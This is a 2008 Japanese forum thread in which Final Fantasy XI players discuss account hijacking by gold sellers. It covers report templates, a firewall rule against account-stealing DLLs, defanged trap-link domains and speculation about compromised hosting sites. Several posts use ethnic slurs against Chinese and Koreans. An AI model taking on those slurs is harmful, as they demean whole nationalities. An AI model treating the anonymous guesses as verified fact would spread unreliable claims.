●● RMT業者の垢ハックが多発している件39 ●●

このエントリーをはてなブックマークに追加
1テンプレ
■被害報告をされる方は被害報告用テンプレに沿って書き込みをお願いします
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件38 ●● http://changi.2ch.net/test/read.cgi/ogame/1219950507/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)

■テンプレ = ttp://www.geocities.jp/ff11warning/template/ (ttp://miku.xrea.jp/template/のミラーサイト)
  「一般テンプレ」に関してはこちらのサイトをご覧ください
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます)= ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け)= ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり)= ttp://ort.sakura.ne.jp/taisai/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)
2テンプレ:2008/09/07(日) 05:06:06 ID:P9apNmu6
----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無:Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)
3テンプレ:2008/09/07(日) 05:06:52 ID:P9apNmu6
■各種ソフトのアップデート報告(情報提供等)について
スレ内を検索しやすいように各種ソフトのupdate情報には符丁をつけておくことを推奨します。

★FlashPlayerなどAdobe系ソフト、Firefoxなどブラウザ、NoScriptなどアドオンなどの更新があったときには
 ※※各種ソフトウェアアップデート情報※※

★セキュリティホールに関するニュースが出たときには
 ※※セキュリティホール情報※※

を付けてみてください。


以上、ここまでテンプレ

■そのほかの一般テンプレに関しては「>>1」にあるテンプレサイトの「具体的な自衛策」をご覧ください
4テンプレ番外:2008/09/07(日) 05:09:36 ID:P9apNmu6
前スレで要望がありましたので出しておきます

■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
 現在、上記に該当する既知のものはwzcsvbxm.dll系・Kernaeghdrv.dll系です。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
 設定が簡単になります。

空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
5既にその名前は使われています:2008/09/07(日) 05:35:46 ID:P9apNmu6
前スレの>>964に出ていた件
必要性はあまり感じませんが、必要だと思われる方は反応してくださいm(_ _)m

964 :既にその名前は使われています:2008/09/07(日) 00:44:58 ID:2eVn6Peg
【トロイ広告】xrea.com part135【放置プレイ】
http://pc11.2ch.net/test/read.cgi/hosting/1219797151/301

> 301 名前:名無しさん@お腹いっぱい。:2008/09/06(土) 23:44:25 0
> >>299
> それさ、flashなどの惰弱製を狙ったウィルスはFF11のクライアントソフトの内容を書き換えるものだった
> だけどFF Warningとかいうサイトでは大元のウィルスに対する対策しか報じていない
> ウィルスによって書き換えられたクラインアントソフトに対して何の対策も講じていないんだよ
> それなのにこの話題を扱ったスレでは「カスペルスキーでオンラインスキャンしろ」
> とかいう対策がまかり通っている。それで安全だと思っている
> その程度の危機意識の管理人がサイト運営をしている
>
> カスペルスキーが対策したのは大元のウィルスで、そのウィルスによって仕込まれた可能性のあるスパイウェアじゃない


pol.exeが書き換えられるのか?詳しい人解説を頼む。
65:2008/09/07(日) 05:49:43 ID:P9apNmu6
とりあえずPOL.exe改竄については、かなり前のスレで話題になっていましたので
そのときのログ↓

>353 :既にその名前は使われています:2008/07/11(金) 17:41:16 ID:ZiN5jL/U
>MD5 (pol.exe) = dc11348f317f613aa55c3e8b4b749c09
>恐らく感染していないだろうpolのMD5値です。ファイルサイズは>347と一緒
 ↓
>398 :既にその名前は使われています:2008/07/11(金) 18:48:52 ID:4z35c7ut
>多分感染してるPCのpolです(シャットダウンと終了オプション アプリケーションの追加と削除が異様に遅い)
>MD5 (pol.exe) = dc11348f317f613aa55c3e8b4b749c09
>1,691,648 バイト
>pol改ざんじゃないのかな
7既にその名前は使われています:2008/09/07(日) 06:22:05 ID:d+7RvZWq
続きくらいかけと・・・>>ID:P9apNmu6


POL.exeが改竄される件についてはこのスレで結論出てますね

398の「多分」の部分を完全に打ち消したいので、できれば感染経験者さんに
もう一度POL.exeをVirus Totalにでも投げてもらって、そのMD5値を確認したい
ところです
8既にその名前は使われています:2008/09/07(日) 07:32:02 ID:a1yOjulH
特定のソフトを貶めたいわけじゃないんですが、嘘情報が広まるのもよくないので
前スレのノートンファイアウォールについての続き

>>953
> ノートン360はウンコという評価が定番

>>954
>急にノートン叩き湧き出して笑った。
>NIS入ってると1039045744:88みたいな普通使わないポート88使うようなのは警告出てバレるのに気がついたのかね。

>>956
>本当に警告でる?

>>958
>「全てを許可」なんてアホな設定にしてなければ出ます。

>>959
>360で検証
>デフォルト設定 → 普通に接続できます。
>99をブロックするように設定 → 当然ブロック。ただしログはでない。
9既にその名前は使われています:2008/09/07(日) 07:42:50 ID:a1yOjulH
前スレは360の検証だったのでNIS2008でも確認

・デフォルト設定 → 普通に接続できます
・99をブロックするように設定 → 当然ブロック。

これはいいとして、NISは360と違い、「ログを出す」オプションがあるんですが、
★ログは実際には出ません★

以下のログのいずれにも記録されません。
「ネットワーク接続」「ファイアウォールの活動」「侵入防止」「サービスの活動」
「ファイアウォールの警告」「セキュリティリスク」「保護活動」「エラーメッセージ」

ファイアウォールの「プログラム制御」による設定でも「信頼制御>一般ルール」の
いずれでもブロックはするもののログは出力されません。
こんな超弩級の基本的なバグが放置されてるって一体・・・・

また、ログではなく「警告を画面に出す」機能は最初からありません。
うーむ・・・。初心者に警告出しても「これなに?」ってサポートに問い合わせがくるからやめておこうってことなのか・・・?

それともなんか俺勘違いしてる? 「こうやれば出るよ!」とか「俺の環境だと警告出る」とかあれば言ってください。
10既にその名前は使われています:2008/09/07(日) 08:06:30 ID:i9/Ql2Jh
ヤフオクで「ID乗っ取り」3000件、知らぬ間に大量出品
今年7〜8月に集中、中国・韓国などのアジアから不審な接続
ttp://headlines.yahoo.co.jp/hl?a=20080905-00000063-yom-soci

シナチョンの連中こんなこともやってるぞ

11既にその名前は使われています:2008/09/07(日) 09:45:49 ID:j9D/cbNj
新スレ乙です
12既にその名前は使われています:2008/09/07(日) 09:50:35 ID:EZyKY4Mh
マジで特亜人って人類の癌細胞だわw
13既にその名前は使われています:2008/09/07(日) 10:52:06 ID:u0P65rU4
ところでこいつを見てくれ、ニコ動のページだ。
罠リンクのとこだけ■入れたから確認するときは直してね。
ttp://209.85.175.104/search?q=cache:WUARlqgZXbUJ:www.nicovideo.jp/watch/sm4271888+excite-blog■com&hl=ja&ct=clnk&cd=28&client=opera

このように罠リンクが書き込まれている、つまりは内部に入り込んだということかね。
当然今は罠リンク部分は除去済みだけど。

気をつけてくれよな!
14既にその名前は使われています:2008/09/07(日) 12:45:38 ID:/U63M+mv
age
15既にその名前は使われています:2008/09/07(日) 12:57:13 ID:XgMe+0pj
>>5
なんかこのレスの人微妙にズレてるっつーか、スレで話してる内容ちゃんと理解してないっぽいんだよね

>それなのにこの話題を扱ったスレでは「カスペルスキーでオンラインスキャンしろ」 とかいう対策がまかり通っている。それで安全だと思っている
カスペオンラインが薦められるのはその手のトロイに対する定義ファイルの対応が「比較的」早いので
検出の可能性が「若干」高いから。怪しいと思ったらまず原因を見つけとけって話でしょ。
見つけた後の事後「対策」はまた別の話だと思う。

>カスペルスキーが対策したのは大元のウィルスで、そのウィルスによって仕込まれた可能性のあるスパイウェアじゃない
っていう認識は現状と真逆でしょ。悪さをするトロイ自体は特定できたけど、
そいつを生成する(仕込む)大元のドロッパなんかを見つけられてないからクリンインスコでまっさらにしろって薦められてるんだし。

一昔前のwzcsvbxm.dllの挙動「pol.exeの起動と同時に干渉し送信データを盗む」「潜伏するためにWindowsupdateに係るレジストリを書き換える」
そのへんをごっちゃにして「クライアントソフト自身が書き換えられる」とか言ってんじゃないの

つーか「惰弱性」とか言ってる時点でよくわかってない子の気がするよ
16既にその名前は使われています:2008/09/07(日) 13:51:06 ID:1aN0tAVY
バスター未検知でカスペでTrojan-Downloader.JS.Agent.clnが出た。
これ垢ハックと関係あるよな・・・
めんどくせー
17既にその名前は使われています:2008/09/07(日) 13:59:27 ID:96XaC83y
面倒なら是非そのままで
18既にその名前は使われています:2008/09/07(日) 14:43:30 ID:zDuml//+
age
19既にその名前は使われています:2008/09/07(日) 14:52:50 ID:fzWKA96R
前スレ
>>986>>990
サービス終了にしたいんじゃなくてw
最大の対策はサービス終了くらいしかないって意味で
20既にその名前は使われています:2008/09/07(日) 14:54:09 ID:kAqzFDMF
wikipediaまた韓国に戻ったみたいだね
21既にその名前は使われています:2008/09/07(日) 16:46:59 ID:zcjAbgev
249からあげあげ
22既にその名前は使われています:2008/09/07(日) 17:12:33 ID:GZkd69Gd
ほしゅ
23既にその名前は使われています:2008/09/07(日) 17:42:51 ID:et3/39ah
とうとうニコニコもやられたのか。シナチク糞だな…。
24既にその名前は使われています:2008/09/07(日) 17:50:47 ID:3si1g2uS
>>13
それってBlogとかにあるニコ動リンク?
それともニコ動内を見てるだけでアウトなの?
25既にその名前は使われています:2008/09/07(日) 18:00:38 ID:fK3v7qah
>>19
中華の中継プロキシつぶせばいいじゃん
どんどん
26既にその名前は使われています:2008/09/07(日) 18:11:55 ID:u0P65rU4
>>24
www.nicovideo.jp/watch/sm4271888

13はこれのキャッシュだよ(今は害がある文面ではない)。
当時でも直接リンクになっていないからコピペしてアクセスを試みなければよいのだけど、
うっかり引っかかったやつがいたんだろうね。
投稿した動画などから狙いはコピペしてアクセスしてくれることを期待しつつ、
虱潰し的に感染させて根こそぎふんだくろうという作戦だろう。

しかし程なくしてゴルァが入って罠リンク部分が運営によって”test”になったんじゃね?

ニコにはもう中華が入り込んだと見ていい、アカウントも残ったままだ、
ライブドアの対応並に厄介かもしれない。

動画の説明にリンクが書かれていたらコピペアクセス前に検索をかける癖をつけないと
引っかかるやつ多発しそう。

気をつけてくれよな!
27既にその名前は使われています:2008/09/07(日) 18:14:43 ID:kJLh6wMV
ニコで色んなMMOの広告がある→中華介入→中華^q^ドワンゴ^q^
28既にその名前は使われています:2008/09/07(日) 18:19:17 ID:fzWKA96R
こんな所で悩んでないでPS2買ったら?
出来ればPS-Xがいいと思います!
29既にその名前は使われています:2008/09/07(日) 18:28:16 ID:4uLGfdbL
www.nicovideo.jp/watch/sm4271888のうぷ主は業者ではないね。
マイリス公開してるし 同じハンドルでサイトもやってて結構いろんなとこで着メロの配信もしてる。
ニコニコのパス抜きに引っかかったと見るべきかと思います。
参考までにsm4271888は現時点で 再生数11
30既にその名前は使われています:2008/09/07(日) 19:16:12 ID:+Uu8iire
>>16
俺もバスターwさん使い
カスペで月1の割合でオンラインスキャンしてるんだが、一度もウィルスかからず。
こういうのは「重要な領域」以外から見つかるものなのか?

ageage
31既にその名前は使われています:2008/09/07(日) 19:22:23 ID:/OVVhCGv
【site:xrea.com ff11】13100件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja
【site:xrea.com ffxi 】10700件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja
【site:xrea.com final fantasy xi】1170件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja
【site:xrea.com final fantasy 11】5580件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja

これも張っておきます。
正月休み前にも再び改竄ありそうだけど、
その前の連休とかバージョンアップ時に狙われそうだ。
鯖側でひそかに対応してるかもしれないけど。
32貼り直し:2008/09/07(日) 19:24:28 ID:/OVVhCGv
33既にその名前は使われています:2008/09/07(日) 19:32:45 ID:Vaq4zvQ5
うちのサイトcoreserver.jp使ってるんだけど
中国圏から大量の検索ログ残ってた

coreserver.jp ff11
34既にその名前は使われています:2008/09/07(日) 19:41:16 ID:/OVVhCGv
>>33
ttp://bantouhan.com/2007/08/post_275.php
>「XREA.COM」と「CORESERVER.JP」とは、運営会社が同じで、コントロールパネルも同じなので、

やばいかもしれんね。
35既にその名前は使われています:2008/09/07(日) 20:16:51 ID:HnX6qcM9
xreaサイトIP

50.139.29.96 - 59.139.29.127       59.139.29.224 - 59.139.29.255
60.32.200.64 - 60.32.200.95        60.32.201.90 - 60.32.201.127
125.53.24.64 - 125.53.24.95        125.53.24.128 - 125.53.24.159
125.53.25.0 - 125.53.25.63        125.53.25.224 - 125.53.26.31
202.229.187.24 - 202.229.187.27      210.153.88.112 - 210.153.88.115
210.172.108.224 - 210.172.108.255     210.196.169.192 - 210.196.169.223
210.196.173.48 - 210.196.173.63      210.196.176.176 - 210.196.176.191
210.251.253.224 - 210.251.253.255     218.216.67.32 - 218.216.67.63
219.101.229.128 - 219.101.229.191     219.163.5.176 - 219.163.5.191
219.163.200.64 - 219.163.200.127     221.186.251.64 - 221.186.251.127
222.227.75.0 - 222.227.75.63       222.227.75.96 - 222.227.75.159

補完あればよろしく
36既にその名前は使われています:2008/09/07(日) 20:35:04 ID:3YI6N1+P
なぜXreaの運営は対策をしないのか
なぜなんだい
37既にその名前は使われています:2008/09/07(日) 20:39:22 ID:ElmMYC6w
周りが騒いでるのニヤニヤして楽しんでる
38既にその名前は使われています:2008/09/07(日) 20:42:11 ID:HnX6qcM9
>>36
重要度の問題かもしれませんね
たかがゲームになんの対策だと思ってる運営かもしれません
39既にその名前は使われています:2008/09/07(日) 21:35:45 ID:Q4cxzYaa
逆に考えるんだ、対策をしないのではなくハニーポットなのだと
40既にその名前は使われています:2008/09/07(日) 21:38:43 ID:4uLGfdbL
サポートみてても 最近のXREAはVALUE DOMAINのオマケで
やりたくないのにやってるって感じ。

XREAは広告ついてる無料のユーザーでも シェルもcronもDBもcgi使える。
coreで年額5000円 xreaで2400円 
比較できる料金帯だとさくらのスタンダード一択だけど DBが弱いから MTやWPやってる人には厳しい。
よそで同じ機能のレン鯖借りようと思ったら1年最低5万かかると思ってくれ。

つまりXREAはノンサポート前提で 他のレン鯖に比べたら超やっすい。
その代わり基本的なトラブルはユーザで解決してくれってスタンス。
だから イヤナラヤメテモイインジャヨ なんだと思うよ。
それはかまわないんだが 前回の広告のときの対応の遅さにあきれて見切りつけたくても 
機能と費用考えたら手ごろな移転先がない=競合がない状態だから
それで 放置してるかもしれないね。
41既にその名前は使われています:2008/09/07(日) 21:41:06 ID:3YI6N1+P
まともに鯖管理する気ねぇなら業務たたんじまえカスが!!!


と電話凸していいですか><
42既にその名前は使われています:2008/09/07(日) 21:41:28 ID:4uLGfdbL
ゲームだから放置ってんじゃなくて もー全体的に放置
負荷の高いサーバがあってもシステム障害が出ても放置
負荷かけてるユーザも放置
放置プレイ
43既にその名前は使われています:2008/09/07(日) 21:51:16 ID:fzWKA96R
このスレもういらなくね?今俺がageなかったら@10年くらいで落ちてたぞ?
44既にその名前は使われています:2008/09/07(日) 21:55:07 ID:HnX6qcM9
>>43
いま88くらいでしたよ
45既にその名前は使われています:2008/09/07(日) 22:30:42 ID:a1yOjulH
前スレでもxreaの話はあったが、xrea,fc2の話は基本レンタル鯖板でやった方がいいと思う。

エンドユーザー側がどういう対策がありうるかはこっちでいいけど。
46既にその名前は使われています:2008/09/07(日) 22:49:14 ID:HnX6qcM9
>>45
スレ維持のためには、いまは話題を選ばないほうがいいと思います
47既にその名前は使われています:2008/09/07(日) 23:05:28 ID:fzWKA96R
まぁ無料だでぐだぐだ言うなw
xrea,fc2は飽きた
48既にその名前は使われています:2008/09/07(日) 23:06:58 ID:t1RrHRi1
>>47
今回は有料のほうもやられとるよ
49既にその名前は使われています:2008/09/07(日) 23:17:03 ID:RVLrptBS
韓国中国はほんとに腐ってるなw
こんな国と一緒にアジアでくくられるとかありえない
50既にその名前は使われています:2008/09/07(日) 23:47:54 ID:EpFXlXM2
age
51既にその名前は使われています:2008/09/08(月) 00:08:29 ID:y5dO6Fj0
ho
52既にその名前は使われています:2008/09/08(月) 00:28:41 ID:3R2Iap7Y
おやすみ前のあげ。
53既にその名前は使われています:2008/09/08(月) 01:20:10 ID:ojEUk+eX
よいしょー
54既にその名前は使われています:2008/09/08(月) 01:21:32 ID:C/TXuFV/
ニコニコ見てたらPG2が反応したわ
なんかキモイ動画だったし納得
55既にその名前は使われています:2008/09/08(月) 01:32:23 ID:+j7s2vwq
それニコニコ市場の商品画像とかの鯖がたまに大陸にあるからだな
56既にその名前は使われています:2008/09/08(月) 01:35:51 ID:KHZNPbGR
徐々にネットに安全な場所がなくなっていくのがなんか嫌だなぁ
57既にその名前は使われています:2008/09/08(月) 01:45:43 ID:52OE/rH3
あげー
58既にその名前は使われています:2008/09/08(月) 02:46:29 ID:q935o361
204唐揚げ
59既にその名前は使われています:2008/09/08(月) 02:55:01 ID:af9EwmMY
おやすみage。
おでん規制かorz どれもこれも垢ハックに起因してるな...

>>13 >>24 >>26 を100回読んだけどいまいち理解できなかったorzモウトシカ...
1)ニコに罠が仕込まれた
2)ニコの動画はブラフでブログでのリンク先が罠になってる(コピペでボーン)

どっちなんだろう。
60既にその名前は使われています:2008/09/08(月) 04:06:33 ID:q935o361
>>59
ニコ動に中華が入り込んでる認識でいいと思いますよ
ニコ動にも罠が仕掛けられてるようです
61既にその名前は使われています:2008/09/08(月) 04:18:51 ID:0fCz8wRX
これyoutubeとかにやられたら世界的に被害広がるんだろか
てか、外国でも中華の垢ハック問題になってんのかな
62既にその名前は使われています:2008/09/08(月) 04:22:33 ID:jr8wE7vW
色々調べてFFやりたいのに出来ないし
ネット巡回も危うくなってきたし
いくら対策しても安心は出来ないし

なんと言ってもFF系を調べる事に恐怖を感じるようになった。
情報ないとやりたい事もできやしない
63既にその名前は使われています:2008/09/08(月) 04:26:20 ID:r8X2arpN
FFはとっくに引退したから関係ないけど
これってブラウザ関係なく抜かれるの?
64既にその名前は使われています:2008/09/08(月) 04:28:36 ID:q935o361
>>63
スクリプトを確実に不許可にできる環境なら「いまのとろは」大丈夫です
スクリプトが許可になってればウィルスは落ちてくる可能性が高いですね
ここで危険だと言われているサイトはとくに
65既にその名前は使われています:2008/09/08(月) 06:41:47 ID:D89/wyuv
NHKでヤフーIDハックのニュース流れてる
66既にその名前は使われています:2008/09/08(月) 06:46:08 ID:D89/wyuv
>>62
すっげーわかるわ
ネットで調べないと何も出来ない何も準備できないのに
危険だからネット巡回できない
安全にスクリプト全部切ってネット巡回すると、サイトの内容が表示されないからやっぱりFFできないw
公式攻略サイトでもつくってくれ■e
67既にその名前は使われています:2008/09/08(月) 06:59:31 ID:HR7/KtOk
>>62
>>66
つ電撃本
68既にその名前は使われています:2008/09/08(月) 07:43:31 ID:ehBlxuGO
PS2買えば全て解決では?
69既にその名前は使われています:2008/09/08(月) 09:58:24 ID:kDOIvn+p
ところで、アメリカとかで垢ハックはやってるの?
スクエニがハックについてpolシステムの変更を検討中をか話は聞かないけど。
米にハックがはやってたらもっと具体的な対策とらないか?
70既にその名前は使われています:2008/09/08(月) 10:04:29 ID:ojEUk+eX
保守のついでに俺対策。
FF専用機を購入してセキュリティ一通り設定して、1ログインログアウト毎にPS2で入りなおしてパス変えて
PCでFF中も、万が一業者とログイン合戦になった時の為にPS2をログイン画面で待機させている。
それでも不安でーす○| ̄|_
71既にその名前は使われています:2008/09/08(月) 10:10:16 ID:3gUpYF64
>>69
NAの友人に垢ハックについて聞いてみたところ、「知っている」とは言ってたけど
日本ほどやられてるってわけじゃないみたいだ。
なんでだろなあ?
あっちの人は皆セキュリティ意識が高いとか?
俺の英語能力では聞き出すことができんかったw
72既にその名前は使われています:2008/09/08(月) 10:18:21 ID:V49Ntf8R
>>71
業者の2/3近くが中国、残りの1/3近くが日本在住の業者だからじゃねーの?
73既にその名前は使われています:2008/09/08(月) 10:36:45 ID:6ad+/hAj
>>71
嘘つくなw
英語がわからないだけでそれがフィルターになってるだけだろ・・
http://www.bluegartrls.com/forum/forumdisplay.php?f=48

普通に話題になってるからみてこいよw
74既にその名前は使われています:2008/09/08(月) 10:54:14 ID:3gUpYF64
>>73

_| ̄|○
どこで話題になってるかすらわからねぇ・・・俺の英語能力底辺すぎる
75既にその名前は使われています:2008/09/08(月) 11:03:09 ID:fAEWBEVY
お前が勝手に安全と思ってるだけで昔っからネットは危険なところでしたよっと
76既にその名前は使われています:2008/09/08(月) 11:08:41 ID:cgSDN3ix
77既にその名前は使われています:2008/09/08(月) 11:56:03 ID:eA1kS4lA
>>75
危険/安全どっち? といえば昔から危険だったんだろうが、ここ1〜2年で桁違い。

例えるなら、
昔のハッカ(いたずらっ子)ー=西サルタのヤグ → 今のハッカー(犯罪者)=AbsoluteVirtue
昔:近づかなければ大丈夫、今:タゲられたら死ぬしかないレベル。
78既にその名前は使われています:2008/09/08(月) 12:18:06 ID:PFSf1pTI
>>77
昔のハッカーは20世紀の話で「ここ1〜2年」じゃないだろ
79既にその名前は使われています:2008/09/08(月) 14:01:06 ID:J3J+5JJF
自己顕示欲から金銭目当てに動機がシフトしたからだろ
80既にその名前は使われています:2008/09/08(月) 14:33:57 ID:eRiSmt7L
270からあげ
81既にその名前は使われています:2008/09/08(月) 14:43:52 ID:g2FLUzow
>>79
それは>>77と同じで認識が古い
金儲けの手法自体がどんどん進化してることが問題
82既にその名前は使われています:2008/09/08(月) 14:57:48 ID:gOf3EkFq
MMOのゲームデータがいい金になる、なんて数年前には予想もつかなかった。
たかがゲームとヌルい事言われているうちに全力でハクる。
83既にその名前は使われています:2008/09/08(月) 15:23:28 ID:eRiSmt7L
まぁでも、書き込みもかなり減ったから落ち着いてきている
状況ではあるのでしょうね
一回やられて注意する人が増えたのか、二回目もやられて
泣く泣く引退した人が増えたのか、どっちだかわからないけど
84既にその名前は使われています:2008/09/08(月) 16:24:10 ID:H87lIcUa
ハックされて一回目で引退したよ。
悔いはLSの人、フレにちゃんとあいさつ出来なかった事。
マジで特亜は地球の癌。
(´∀`∩)↑age↑
85既にその名前は使われています:2008/09/08(月) 16:34:59 ID:gOf3EkFq
面倒な警察届け出とかまでの段階にいく人は多くないのかもしれないね。
ちょっと飽きて来たしこのままでいいかってな泣き寝入り含むと
相当数、今も静かに被害で続けているのかも。
86既にその名前は使われています:2008/09/08(月) 16:37:46 ID:6ad+/hAj
>>85
あの電話のつながらなさを体験すると
もうどうでもいやってなる人がでるのは当然だろw
87既にその名前は使われています:2008/09/08(月) 16:39:47 ID:zePAMs9G
FFはPS2でやってるから問題ないが、メールの広告クリックしてポイント貯めるサイトでやられた。
全部パス一緒だったし、まあ自分が甘かったわけだが約3万の損失。
88既にその名前は使われています:2008/09/08(月) 16:50:24 ID:NtAVRFzP

↑↑↑↑↑
↑PON!↑
↑↑↑↑↑ 
89既にその名前は使われています:2008/09/08(月) 16:56:16 ID:MDUcReok
>>86
不正アクセスはチャット汁だぞ
90既にその名前は使われています:2008/09/08(月) 16:57:21 ID:waOb9nxe
ヤフオク「ID乗っ取り」報道に反論、情報流出の事実はない
http://internet.watch.impress.co.jp/cda/news/2008/09/08/20788.html
91既にその名前は使われています:2008/09/08(月) 17:15:40 ID:1ux/xFhq
>>90
少なくともID=パスの馬鹿には返金どころかヤフー側が損害賠償請求していいだろ
92既にその名前は使われています:2008/09/08(月) 17:19:28 ID:N6rm9Ltp
ヤフオクやってる奴は気の毒だが、
これで中華=垢ハックが少しでも多くの人に知られるようになるのはありがたい
93既にその名前は使われています:2008/09/08(月) 17:19:44 ID:hGu5pLWB
ID=パスを通すYahooのシステムが・・・
94既にその名前は使われています:2008/09/08(月) 17:43:45 ID:eRiSmt7L
>ログイン後は、ゲームデータに被害を受けていないかどうか、ご確認ください。
>また、不正アクセスに遭われた旨を、最寄りの警察署へ通報してください。

いちおうスクエニも警察に通報しろって言ってるのね
不正アクセス対策をしっかり読んでて初めて知った
95既にその名前は使われています:2008/09/08(月) 18:32:23 ID:9pGukVIS
最近PG2のブロック履歴で666■lazh■comが頻繁にあったんで
見に行ったサイトまわってみたら「R.ブレス ソロ ラーニング」でぐぐって
一番目のとこだった。

http://d■hatena■ne■jp/mako0079/
調べ物とかほんと気軽にできなくなったなぁ。
96既にその名前は使われています:2008/09/08(月) 18:37:19 ID:XkPRbnpR
xreaってeLeMeNも使ってるみたいだけど見ただけでヤバいの?
97既にその名前は使われています:2008/09/08(月) 18:40:25 ID:7MJP/2Sm
>>96
サイトはplala
解析だけAccessAnalyzer
98既にその名前は使われています:2008/09/08(月) 19:06:59 ID:XkPRbnpR
サイト自体にxrea使ってなければ大丈夫って事なのか。
99既にその名前は使われています:2008/09/08(月) 19:15:39 ID:iF0HAmRi
その考え方は危険だよ。

xreaだけが危険って訳じゃないしさ。
100既にその名前は使われています:2008/09/08(月) 19:38:36 ID:HbdQ5VOP
>95
そこは昔からあるFFブログのアンテナだな。
おそらく引っかかってるのはその先のはず。
今手元に調査する環境が無いから誰か頼む。
101100:2008/09/08(月) 19:40:12 ID:HbdQ5VOP
>95
すまん、URL勘違いした。
FFアンテナは似てるけど違うところだった。
102既にその名前は使われています:2008/09/08(月) 19:47:13 ID:7MJP/2Sm
eLeMeNに解析違うのにしたら?って言ったら
うざって返ってきた
103既にその名前は使われています:2008/09/08(月) 19:58:52 ID:0dP8UDHl
アンチ乙
104既にその名前は使われています:2008/09/08(月) 20:57:04 ID:y5dO6Fj0
浮上
105既にその名前は使われています:2008/09/08(月) 21:24:31 ID:NIMda1OG
IDがニムダ10ギル・・・
記念に上げさせてください><
106既にその名前は使われています:2008/09/08(月) 21:56:25 ID:wq6g7muI
age
107既にその名前は使われています:2008/09/08(月) 22:14:46 ID:0rBZ2CDi
>>40
対応ごてごて
+ユーザー呼び込みに無料広告免除
http://sb.xrea.com/forumdisplay.php?f=17

http://magmagmag.at.webry.info/200809/article_3.html
しかないかなぁ
108既にその名前は使われています:2008/09/08(月) 22:16:39 ID:ogJPYMhV
ん?
plalaも危険なの?
何かポップアップブロックの設定の許可されたサイトの欄に
勝手に*.plala.jpが入ってた。
109既にその名前は使われています:2008/09/08(月) 22:31:49 ID:iV04zgsQ
>>102
ウザッてこともなかったが
部外者がくちdって帰ってきたことがあったな
110既にその名前は使われています:2008/09/08(月) 22:42:00 ID:+BRKslep
>>59>>60
おれもいまいち理解出来なかったorzスマン
今の所の情報では、動画(ニコ動)をクリックで直に罠サイトへ飛ぶ訳では無いって事で
いいのかな?
>>13 >>24 >>26の文面だとコメント(投稿者として?)にアドレスがあったように読めるけど、
動画自体が罠サイト付きにも読めるので(^^;
とりあえずの対策は、クリック前にマウスあててアドレス見たり>>26で書いてあるように
コメントは読む程度で、アドレスあっても全部無視する位がいいかな。
動画自体にはジャンプ機能なんてのが少し前に実装されたけど、これって外部に飛ばしたりは
出来るのだろうか?
111既にその名前は使われています:2008/09/08(月) 22:47:10 ID:/FLNi09F
>>107
何度も繰り返されてるようにXREAさえ弾いてりゃ安心って誤解が一番怖いんだけどねぇ。
そのブログ読むと OPENDNS設定すりゃ垢ハクにあわなくて ff11プレイヤーだけの問題みたいに読めて
あんまりいい印象はもてないなぁw
112既にその名前は使われています:2008/09/08(月) 22:52:20 ID:FnqYsYhv
verup前後は、FF系のいろんなサイトが改ざんされそだな。
113既にその名前は使われています:2008/09/08(月) 23:00:24 ID:/FLNi09F
で有名な話はこれ 英文だけど
